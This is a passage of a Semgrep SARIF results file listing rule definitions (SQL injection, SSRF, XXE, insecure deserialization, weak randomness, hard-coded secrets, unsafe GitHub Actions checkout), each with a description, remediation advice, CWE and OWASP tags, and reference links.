system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.code.vm-express.vm-express)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"helpUri":"https://semgrep.dev/r/javascript.express.code.vm-express.vm-express","id":"javascript.express.code.vm-express.vm-express","name":"javascript.express.code.vm-express.vm-express","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.code.vm-express.vm-express"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The function `mktemp` is deprecated. When using this function, it is possible for an attacker to modify the created file before the filename is returned. Use `NamedTemporaryFile()` instead and pass it the `delete=False` parameter."},"help":{"markdown":"The function `mktemp` is deprecated. When using this function, it is possible for an attacker to modify the created file before the filename is returned. Use `NamedTemporaryFile()` instead and pass it the `delete=False` parameter.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.file.avoid-mktemp.avoid-mktemp)\n - [https://docs.python.org/3/library/tempfile.html#tempfile.mktemp](https://docs.python.org/3/library/tempfile.html#tempfile.mktemp)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"The function `mktemp` is deprecated. When using this function, it is possible for an attacker to modify the created file before the filename is returned. Use `NamedTemporaryFile()` instead and pass it the `delete=False` parameter."},"helpUri":"https://semgrep.dev/r/python.lang.file.avoid-mktemp.avoid-mktemp","id":"python.lang.file.avoid-mktemp.avoid-mktemp","name":"python.lang.file.avoid-mktemp.avoid-mktemp","properties":{"precision":"very-high","tags":["CWE-377: Insecure Temporary File","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.file.avoid-mktemp.avoid-mktemp"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for requests sent via http.$FUNC to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS."},"help":{"markdown":"Checks for requests sent via http.$FUNC to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.http-request.http-request)\n - [https://golang.org/pkg/net/http/#Get](https://golang.org/pkg/net/http/#Get)\n","text":"Checks for requests sent via http.$FUNC to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.http-request.http-request","id":"problem-based-packs.insecure-transport.go-stdlib.http-request.http-request","name":"problem-based-packs.insecure-transport.go-stdlib.http-request.http-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.go-stdlib.http-request.http-request"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected use of the functions `Math.random()` or `java.util.Random()`. These are both not cryptographically strong random number generators (RNGs). If you are using these RNGs to create passwords or secret tokens, use `java.security.SecureRandom` instead."},"help":{"markdown":"Detected use of the functions `Math.random()` or `java.util.Random()`. These are both not cryptographically strong random number generators (RNGs). If you are using these RNGs to create passwords or secret tokens, use `java.security.SecureRandom` instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crypto.weak-random.weak-random)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected use of the functions `Math.random()` or `java.util.Random()`. These are both not cryptographically strong random number generators (RNGs). If you are using these RNGs to create passwords or secret tokens, use `java.security.SecureRandom` instead."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crypto.weak-random.weak-random","id":"java.lang.security.audit.crypto.weak-random.weak-random","name":"java.lang.security.audit.crypto.weak-random.weak-random","properties":{"precision":"very-high","tags":["CWE-330: Use of Insufficiently Random Values","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crypto.weak-random.weak-random"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Go, it is possible to adopt prepared statements by using the `Prepare` and `PrepareContext` calls with parameterized queries. For more information, see: [Prepared statements in Go](https://go.dev/doc/database/prepared-statements)."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Go, it is possible to adopt prepared statements by using the `Prepare` and `PrepareContext` calls with parameterized queries. For more information, see: [Prepared statements in Go](https://go.dev/doc/database/prepared-statements).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.net.sql.pg-sqli-taint.pg-sqli-taint)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://pg.uptrace.dev/queries/](https://pg.uptrace.dev/queries/)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Go, it is possible to adopt prepared statements by using the `Prepare` and `PrepareContext` calls with parameterized queries. For more information, see: [Prepared statements in Go](https://go.dev/doc/database/prepared-statements)."},"helpUri":"https://semgrep.dev/r/go.net.sql.pg-sqli-taint.pg-sqli-taint","id":"go.net.sql.pg-sqli-taint.pg-sqli-taint","name":"go.net.sql.pg-sqli-taint.pg-sqli-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: go.net.sql.pg-sqli-taint.pg-sqli-taint"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"XML external entities are enabled for this XMLInputFactory. This is vulnerable to XML external entity attacks. Disable external entities by setting \"javax.xml.stream.isSupportingExternalEntities\" to false."},"help":{"markdown":"XML external entities are enabled for this XMLInputFactory. This is vulnerable to XML external entity attacks. Disable external entities by setting \"javax.xml.stream.isSupportingExternalEntities\" to false.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.xmlinputfactory-external-entities-enabled.xmlinputfactory-external-entities-enabled)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://www.blackhat.com/docs/us-15/materials/us-15-Wang-FileCry-The-New-Age-Of-XXE-java-wp.pdf](https://www.blackhat.com/docs/us-15/materials/us-15-Wang-FileCry-The-New-Age-Of-XXE-java-wp.pdf)\n","text":"XML external entities are enabled for this XMLInputFactory. This is vulnerable to XML external entity attacks. Disable external entities by setting \"javax.xml.stream.isSupportingExternalEntities\" to false."},"helpUri":"https://semgrep.dev/r/java.lang.security.xmlinputfactory-external-entities-enabled.xmlinputfactory-external-entities-enabled","id":"java.lang.security.xmlinputfactory-external-entities-enabled.xmlinputfactory-external-entities-enabled","name":"java.lang.security.xmlinputfactory-external-entities-enabled.xmlinputfactory-external-entities-enabled","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","LOW CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.xmlinputfactory-external-entities-enabled.xmlinputfactory-external-entities-enabled"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.jdbctemplate-sqli.jdbctemplate-sqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables."},"helpUri":"https://semgrep.dev/r/java.spring.security.jdbctemplate-sqli.jdbctemplate-sqli","id":"java.spring.security.jdbctemplate-sqli.jdbctemplate-sqli","name":"java.spring.security.jdbctemplate-sqli.jdbctemplate-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.jdbctemplate-sqli.jdbctemplate-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.request.ssrf-deepsemgrep.ssrf-deepsemgrep)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/javascript.express.request.ssrf-deepsemgrep.ssrf-deepsemgrep","id":"javascript.express.request.ssrf-deepsemgrep.ssrf-deepsemgrep","name":"javascript.express.request.ssrf-deepsemgrep.ssrf-deepsemgrep","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.request.ssrf-deepsemgrep.ssrf-deepsemgrep"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet-core.sqli.systemdata-taint.systemdata-taint)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/csharp.dotnet-core.sqli.systemdata-taint.systemdata-taint","id":"csharp.dotnet-core.sqli.systemdata-taint.systemdata-taint","name":"csharp.dotnet-core.sqli.systemdata-taint.systemdata-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet-core.sqli.systemdata-taint.systemdata-taint"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Checks if code allows cookies to be deserialized using Marshal. If the attacker can craft a valid cookie, this could lead to remote code execution. The hybrid check is just to warn users to migrate to :json for best practice."},"help":{"markdown":"Checks if code allows cookies to be deserialized using Marshal. If the attacker can craft a valid cookie, this could lead to remote code execution. The hybrid check is just to warn users to migrate to :json for best practice.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.cookie-serialization.cookie-serialization)\n - [https://github.com/presidentbeef/brakeman/blob/main/lib/brakeman/checks/check_cookie_serialization.rb](https://github.com/presidentbeef/brakeman/blob/main/lib/brakeman/checks/check_cookie_serialization.rb)\n - [https://robertheaton.com/2013/07/22/how-to-hack-a-rails-app-using-its-secret-token/](https://robertheaton.com/2013/07/22/how-to-hack-a-rails-app-using-its-secret-token/)\n","text":"Checks if code allows cookies to be deserialized using Marshal. If the attacker can craft a valid cookie, this could lead to remote code execution. The hybrid check is just to warn users to migrate to :json for best practice."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.cookie-serialization.cookie-serialization","id":"ruby.lang.security.cookie-serialization.cookie-serialization","name":"ruby.lang.security.cookie-serialization.cookie-serialization","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.cookie-serialization.cookie-serialization"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.redis.ruby-redis-hardcoded-secret.ruby-redis-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/ruby.redis.ruby-redis-hardcoded-secret.ruby-redis-hardcoded-secret","id":"ruby.redis.ruby-redis-hardcoded-secret.ruby-redis-hardcoded-secret","name":"ruby.redis.ruby-redis-hardcoded-secret.ruby-redis-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.redis.ruby-redis-hardcoded-secret.ruby-redis-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"This GitHub Actions workflow file uses `workflow_run` and checks out code from the incoming pull request. When using `workflow_run`, the Action runs in the context of the target repository, which includes access to all repository secrets. Normally, this is safe because the Action only runs code from the target repository, not the incoming PR. However, by checking out the incoming PR code, you're now using the incoming code for the rest of the action. You may be inadvertently executing arbitrary code from the incoming PR with access to repository secrets, which would let an attacker steal repository secrets. This normally happens by running build scripts (e.g., `npm build` and `make`) or dependency installation scripts (e.g., `python setup.py install`). Audit your workflow file to make sure no code from the incoming PR is executed. Please see https://securitylab.github.com/research/github-actions-preventing-pwn-requests/ for additional mitigations."},"help":{"markdown":"This GitHub Actions workflow file uses `workflow_run` and checks out code from the incoming pull request. When using `workflow_run`, the Action runs in the context of the target repository, which includes access to all repository secrets. Normally, this is safe because the Action only runs code from the target repository, not the incoming PR. However, by checking out the incoming PR code, you're now using the incoming code for the rest of the action. You may be inadvertently executing arbitrary code from the incoming PR with access to repository secrets, which would let an attacker steal repository secrets. This normally happens by running build scripts (e.g., `npm build` and `make`) or dependency installation scripts (e.g., `python setup.py install`). Audit your workflow file to make sure no code from the incoming PR is executed. Please see https://securitylab.github.com/research/github-actions-preventing-pwn-requests/ for additional mitigations.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.github-actions.security.workflow-run-target-code-checkout.workflow-run-target-code-checkout)\n - [https://securitylab.github.com/research/github-actions-preventing-pwn-requests/](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/)\n - [https://github.com/justinsteven/advisories/blob/master/2021_github_actions_checkspelling_token_leak_via_advice_symlink.md](https://github.com/justinsteven/advisories/blob/master/2021_github_actions_checkspelling_token_leak_via_advice_symlink.md)\n - [https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability)\n","text":"This GitHub Actions workflow file uses `workflow_run` and checks out code from the incoming pull request. When using `workflow_run`, the Action runs in the context of the target repository, which includes access to all repository secrets. Normally, this is safe because the Action only runs code from the target repository, not the incoming PR. However, by checking out the incoming PR code, you're now using the incoming code for the rest of the action. You may be inadvertently executing arbitrary code from the incoming PR with access to repository secrets, which would let an attacker steal repository secrets. This normally happens by running build scripts (e.g., `npm build` and `make`) or dependency installation scripts (e.g., `python setup.py install`). Audit your workflow file to make sure no code from the incoming PR is executed. Please see https://securitylab.github.com/research/github-actions-preventing-pwn-requests/ for additional mitigations."},"helpUri":"https://semgrep.dev/r/yaml.github-actions.security.workflow-run-target-code-checkout.workflow-run-target-code-checkout","id":"yaml.github-actions.security.workflow-run-target-code-checkout.workflow-run-target-code-checkout","name":"yaml.github-actions.security.workflow-run-target-code-checkout.workflow-run-target-code-checkout","properties":{"precision":"very-high","tags":["CWE-913: Improper Control of Dynamically-Managed Code Resources","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.github-actions.security.workflow-run-target-code-checkout.workflow-run-target-code-checkout"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Kotlin, it is possible to adopt prepared statements using the `connection.PreparedStatement` class with parameterized queries. For more information, see: [Prepared statements in Kotlin](https://developer.android.com/reference/kotlin/java/sql/PreparedStatement)."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Kotlin, it is possible to adopt prepared statements using the `connection.PreparedStatement` class with parameterized queries. For more information, see: [Prepared statements in Kotlin](https://developer.android.com/reference/kotlin/java/sql/PreparedStatement).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.spring.jdbctemplate-sqli.jdbctemplate-sqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Kotlin, it is possible to adopt prepared statements using the `connection.PreparedStatement` class with parameterized queries. For more information, see: [Prepared statements in Kotlin](https://developer.android.com/reference/kotlin/java/sql/PreparedStatement)."},"helpUri":"https://semgrep.dev/r/kotlin.spring.jdbctemplate-sqli.jdbctemplate-sqli","id":"kotlin.spring.jdbctemplate-sqli.jdbctemplate-sqli","name":"kotlin.spring.jdbctemplate-sqli.jdbctemplate-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.spring.jdbctemplate-sqli.jdbctemplate-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.deserialization.tainted-dill-flask.tainted-dill-flask)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://dill.readthedocs.io/en/latest/index.html](https://dill.readthedocs.io/en/latest/index.html)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://pypi.org/project/dill/](https://pypi.org/project/dill/)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections."},"helpUri":"https://semgrep.dev/r/python.flask.deserialization.tainted-dill-flask.tainted-dill-flask","id":"python.flask.deserialization.tainted-dill-flask.tainted-dill-flask","name":"python.flask.deserialization.tainted-dill-flask.tainted-dill-flask","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.deserialization.tainted-dill-flask.tainted-dill-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.db.sqlalchemy-connection-django.sqlalchemy-connection-django)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/python.django.db.sqlalchemy-connection-django.sqlalchemy-connection-django","id":"python.django.db.sqlalchemy-connection-django.sqlalchemy-connection-django","name":"python.django.db.sqlalchemy-connection-django.sqlalchemy-connection-django","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.db.sqlalchemy-connection-django.sqlalchemy-connection-django"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-pycurl.tainted-flask-http-request-pycurl)\n - 